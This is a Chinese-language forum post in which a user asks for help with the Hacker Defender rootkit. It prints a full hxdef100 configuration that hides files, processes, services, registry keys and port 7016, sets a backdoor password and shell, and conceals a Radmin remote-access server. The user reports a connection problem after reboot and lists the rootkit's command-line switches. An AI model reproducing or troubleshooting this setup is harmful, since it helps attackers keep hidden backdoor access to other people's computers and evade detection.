请教关于黑客守卫者的使用问题
我的配置文件如下:
[Hidden Table]
hxdef*
rcmd.exe
R_server*
[Root Processes]
hxdef*
rcmd.exe
R_server*
[Hidden Services]
HackerDefender*
[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100
[Hidden RegValues]
[Startup Run]
[Free Space]
[Hidden Ports]
tcp:7016
udp:7016
[Settings]
Password=7016
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
修改了Radmin的服务端口为7016
运行radmin后 连接正常!
再运行 hxdef100.exe
进程那里r_server没有了!
telnet 服务端ip 7016 能连得上
接下来问题就来了
我重新启动电脑后 telnet 服务端ip 7016
竟然连不上了!! 不过可以连接上黑守!
请问这是怎么一回事???
是不是配错了
还有黑守的查杀工具那有下??
还有这几个参数一没有用
-:installonly /*仅仅进行安装服务,并不同步运行
-:refresh /*重新读取ini设置
-:noservice /*正常运行,但是不安装服务,重新启动的时候恢复, 做测试的时候用
-:uninstall /*将hxdef移出内存,并且断开所有连接和卸载服务
PS:用黑卫隐藏的文件可以通过共享可以查看到
|
